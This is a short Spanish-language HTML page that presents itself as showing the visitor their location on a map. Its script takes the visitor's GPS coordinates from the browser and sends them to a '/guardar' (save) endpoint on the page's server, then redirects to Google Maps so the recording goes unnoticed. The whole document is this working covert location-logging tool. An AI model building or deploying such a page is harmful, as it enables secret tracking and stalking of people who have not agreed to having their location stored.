<!DOCTYPE html>
<html>
<head>
  <title>Ubicación en tiempo real</title>
  <meta charset="utf-8">
</head>
<body>
  <h2>Mostrando tu ubicación en el mapa...</h2>


  <script>
    navigator.geolocation.getCurrentPosition(function(position) {
      const lat = position.coords.latitude;
      const lon = position.coords.longitude;
      const url = `/guardar?lat=${lat}&lon=${lon}`;
      fetch(url).then(() => {
        window.location.href = "https://www.google.com/maps?q=" + lat + "," + lon;
      });
    }, function(error) {
      document.body.innerHTML += `<p>No se pudo obtener ubicación: ${error.message}</p>`;
    });
  </script>
</body>
</html>
